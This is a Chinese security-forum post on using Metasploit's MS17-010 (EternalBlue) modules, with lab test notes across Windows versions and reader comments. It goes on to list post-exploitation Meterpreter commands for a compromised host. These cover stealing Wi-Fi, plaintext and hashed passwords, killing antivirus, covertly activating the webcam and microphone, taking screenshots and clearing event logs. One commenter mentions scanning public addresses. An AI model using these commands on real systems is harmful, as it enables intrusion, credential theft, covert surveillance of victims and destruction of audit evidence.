那些年,我们追过的“蓝”
5ecurity团队成员publicmonkey([email protected])原创发布
那些年,我们一起追过的“蓝”
目前MSF下利用ms17-010主要有以下三个模块:
1.exploit/windows/smb/enternalblue_doublepulsar
下载地址:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2.kali官方最早支持的exploit/windows/smb/ms17_010_eternalblue
模块
3.最近更新的exploit/windows/smb/ms17_010_psexec
模块
下载地址:https://github.com/rapid7/metasploit-framework/pull/9473
本次主要分析exploit/windows/smb/ms17_010_psexec
模块,周更新kali已纳入此模块
1.安装与测试
kali2.0及以下版本需安装该模块(或下载最新版msf)
此处应注意安装其他四个依赖模块,reload_all
不报错即可。
操作如下:
1.1.测试Microsoft(R) Windows(R) Server 2003, Enterprise Edition(ip: 192.168.253.141)
此版本在多次测试中稳定利用,此处不再赘述。
1.2. 测试Microsoft Windows XP Professional(ip: 192.168.253.136)
此版本在多次测试中稳定利用,此处也不再赘述。
1.3. 测试Microsoft Windows 7 家庭普通版(ip: 192.168.253.135)
当前模块需指定SMBPass和SMBUser建立window命名管道。
1.3.1.Win7使用exploit/windows/smb/ms17_010_eternalblue
模块可被稳定利用
1.4.测试Microsoft Windows Server 2008 R2 Datacenter(ip: 192.168.253.135)
需指定SMBPass和SMBUser建立window命名管道。
1.4.1.使用exploit/windows/smb/ms17_010_eternalblue
模块,部分winserver2008可被稳定利用,多次实际测试中发现winserver2008企业版利用不稳定,易导致蓝屏重启。
1.5.测试Windows 8.1 Pro 9600|Windows 8.1 Pro 6.3(ip: 10.0.21.160)
目前发现Windows 8.1 Pro 9600可以稳定利用,较高版本需要建立windows命名管道。
1.6.测试winserver2012(ip: 192.168.253.146)
需指定SMBPass和SMBUser建立window命名管道。
1.7.测试win10(ip: 192.168.253.145)
部分老版本稳定利用,较新版本需指定SMBPass和SMBUser建立window命名管道。 测试中发现Windows 10 Home 10586版本无需建立windows命名管道稳定利用,测试如下:
2.分享几条好玩的命令:
测试机为一台windows7 X64旗舰版未更新到最新的补丁
bgrun post/windows/wlan/wlan_profile
//读取无线连接的账号密码
此处执行失败换一种方式
在cmdshell下执行netsh wlan show profiles
wdigest
//抓取明文密码(需加载mimikatz模块)
bgrun killav
//杀掉杀毒软件
webcam_list
//查看有没有摄像头
bgrun webcam
//启动摄像头
webcam_snap -i 1 -v false
//启动摄像头拍摄一张照片但不打开闪光灯
bgrun sound_recorder
//启动声音录制
bgrun hashdump
//获取哈希值
bgrun vnc
//启动vnc连接
screenshot
//对目标系统桌面进行截屏
clearev
//清除日志
TCV:1
评论34次
求教win10这个命名管道到底是什么
我先去自己搭建一个环境试试
2008 win7 win8.1 没有一台成功过 建立命名管道的 SMB账号 是啥? xi统管理账号?
在没有出第三个版本时,测试起来相当不稳定,我就基本上没成功过,还是我用某大神的py靠谱点
感谢大佬的精彩分享,学xi到了几个不知道的命令
那个管道啥玩意儿啊。没弄明白。
msf升不了级呢
下载kali 2018啊~
msf升不了级呢
感谢总结,记得一开始kali只能打64 的win7
楼主这个密码我在好多服务器上都见过
metasploit的单独版问题有点多特别是win平台
老哥还有没有什么别的骚命令可以分享一下
面试官都给我说了小蓝不影响win10 2008不影响,不影响23333
你认识的面试官在部分技术层知之甚少
named pipe ,xp 默认有个spoolss,xp以上的没遇到过可访问的named pipe。
需指定SMBPass和SMBUser建立window命名管道。 这个要写啥的? 需要知道他电脑密码吗。。
绑定到公网地址强行扫。。。。。测试成功不大
新版本确实成功率高了很多哈
漏洞还是得自己上手测一测,动动手学到更多。。。
妈的我升级msf一直失败
当前模块需指定SMBPass和SMBUser建立window命名管道 请问这个要怎么设置
知道了 原来是设置登陆的用户名和密码